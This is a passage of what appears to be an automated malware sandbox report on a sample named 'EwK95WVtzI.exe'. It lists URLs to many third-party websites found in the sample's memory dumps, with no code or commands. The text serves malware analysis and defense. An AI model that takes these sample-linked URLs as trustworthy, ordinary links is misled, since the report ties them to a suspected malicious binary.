                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1452531175.0000000007A80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1980163682.0000000007980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/6o
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1452531175.0000000007A80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1980163682.0000000007980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/product/%E9%98%B2%E7%88%86%E6%97%A0%E7%BA%BFAP.html
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1452531175.0000000007A80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1980163682.0000000007980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/product/145.html
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1452531175.0000000007A80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1980163682.0000000007980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/product/product.php?class2=7
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1452531175.0000000007A80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1980163682.0000000007980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/product/product.php?class2=79
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1452531175.0000000007A80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1980163682.0000000007980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/product/showproduct.php?id=25
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1452531175.0000000007A80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1980163682.0000000007980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/product/showproduct.php?id=72
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.holleman.us/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.holleman.us/X
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.holleman.us/y
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.hummer.hu/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.hummer.hu/8
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000162E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.hummer.hu/n
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000162E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iamdirt.com/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iamdirt.com/D
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iamdirt.com/J
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iamdirt.com/M
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000162E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.item-pr.com/
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jacomfg.com/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jacomfg.com/%
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jacomfg.com/0
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jchysk.com/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000162E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jenco.co.uk/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000162E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jenco.co.uk/Q_
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jroy.net/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jroy.net/Uo
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.kernsafe.com/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.kernsafe.com/Yj
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.kernsafe.com/qjr
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.koz1.net/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.koz1.net//
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.koz1.net/:
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.koz1.net/YH4
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.koz1.net/e
                Source: EwK95WVtzI.exe, 00000000.00000003.1950572130.0000000001560000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1935975231.0000000001570000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1944036001.0000000001570000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1947333697.0000000003060000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.lagencefrancaise.com
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001613000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.lrsuk.com/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.lrsuk.com/.0
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.lrsuk.com/v
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.maktraxx.com/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.maktraxx.com/1j2
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001613000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.medisa.info/
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.medisa.info/X
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/.d
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/6d
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023659658.0000000008480000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/alone/alone.php?id=25
